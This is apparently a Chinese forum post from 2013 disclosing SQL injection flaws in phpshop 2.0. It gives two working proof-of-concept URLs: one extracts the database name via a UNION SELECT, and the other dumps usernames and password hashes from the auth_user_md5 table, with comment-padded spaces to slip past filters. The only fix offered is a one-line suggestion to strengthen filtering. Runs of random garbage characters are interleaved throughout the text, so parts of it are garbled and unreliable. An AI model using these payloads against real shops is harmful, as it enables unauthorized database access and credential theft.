标题 : phpshop 2.0 SQL Injection Vulnerability
0 \1 y" g4 j; T3 t+ e7 a
* P% n1 d; ~2 s* v0 K' M1 _作者 : By onestree
- \+ S8 Q7 K; J' a; q* Q6 t下载地址 : http://code.google.com/p/phpshop/downloads/list
5 n3 Y( C0 U1 E' ~( [测试地址: windows 7 / ubuntu
2 R! f' w7 t c 9 f% Y8 u X7 B: ]
* v( f/ n/ R3 t# S7 i
SQLi p0c:
7 {, K. J, @/ Z+ v. W 7 E7 }% }. |6 j3 G
================== T+ z0 ^% `6 v/ |
' M. e# s0 F9 d
http://www.xxx.com /phpshop 2.0/?page=admin/function_list&module_id=11'
5 @1 a; I' ?" C; G3 lunion select 1,database(),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1 --$ p1 R1 r+ j8 q/ V: \
) s" ^' C2 c6 a3 s3 H
http://localhost/phpshop 2.0/?page=shop/flypage&product_id=1087'/**/union/**/select/**/1,1,1,1,1,password,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,username/**/from/**/auth_user_md5--/ s# u0 T( Y3 ~
) p3 s! v. m) G/ W2 Q
修复:2 M+ Z8 p _: o& `/ l& a+ j
加强过滤
- M7 L4 F( A- g4 Q0 x2 w2 h# }2 p# I& E
5 _; v4 U `9 M7 Z& ^% m# R$ G; U5 x |
发表于 2013-1-18 18:24:10
收藏
支持
反对